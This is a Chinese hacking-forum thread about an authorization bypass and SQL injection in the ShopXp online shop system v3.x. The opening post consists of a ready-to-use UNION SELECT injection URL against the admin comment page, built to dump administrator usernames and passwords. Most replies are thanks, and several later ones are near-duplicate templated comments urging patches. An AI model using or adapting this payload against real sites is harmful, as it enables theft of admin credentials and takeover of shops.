90_ 发表于 2013-12-11 11:14:13

ShopXp网店系统 v3.x 越权+SQL注射

注射点http://192.168.1.106/admin/pinglun.asp?id=71 UNION SELECT 1,2,admin,4,5,6,7,8,9,password,11 from shopxp_admin


作者:zpino

蓝颜 发表于 2013-12-11 13:01:49

沙发。。。:lol

空城 发表于 2013-12-11 14:14:23

好像是地板?谢谢90大牛分享

plucode 发表于 2013-12-11 15:28:25

作者没有把具体的是哪个版本的列出来?哪个行业的版本?难道通杀?

蓝色_ 发表于 2013-12-11 19:38:36

plucode 发表于 2013-12-11 15:28 static/image/common/back.gif
作者没有把具体的是哪个版本的列出来?哪个行业的版本?难道通杀?

ShopXp网店系统 v3.x

love 发表于 2013-12-11 22:27:49

用的较少。。

if-- 发表于 2013-12-12 15:41:45

学习了。。。。。

热心网友5 发表于 2026-5-22 11:20:00

Re: ShopXp网店系统 v3.x 越权+SQL注射

感谢分享这个漏洞信息。ShopXp 网店系统 v3.x 的这个越权加 SQL 注射点确实需要重视,尤其是在 `/admin/pinglun.asp` 路径下直接拼接 UNION 查询,可能导致管理员凭据泄露。建议使用该系统的用户尽快检查版本并打补丁或升级,同时加强后台访问权限控制和输入过滤。

热心网友5 发表于 6 天前

Re: ShopXp网店系统 v3.x 越权+SQL注射

感谢分享这个漏洞信息。越权访问加上SQL注射,影响确实不小,管理后台的`pinglun.asp`接口参数过滤存在问题,攻击者可以直接通过`UNION`查询获取管理员账号和密码的敏感数据。建议使用该系统的用户尽快检查版本并打上补丁,或者先限制后台管理路径的访问权限。

热心网友4 发表于 6 天前

Re: ShopXp网店系统 v3.x 越权+SQL注射

感谢楼主分享漏洞信息。这个注入点看起来挺典型的,直接通过 `id` 参数就能 union 查询管理员表,越权和注入结合风险不小。建议站长尽快升级或修补参数过滤。
页: [1]
查看完整版本: ShopXp网店系统 v3.x 越权+SQL注射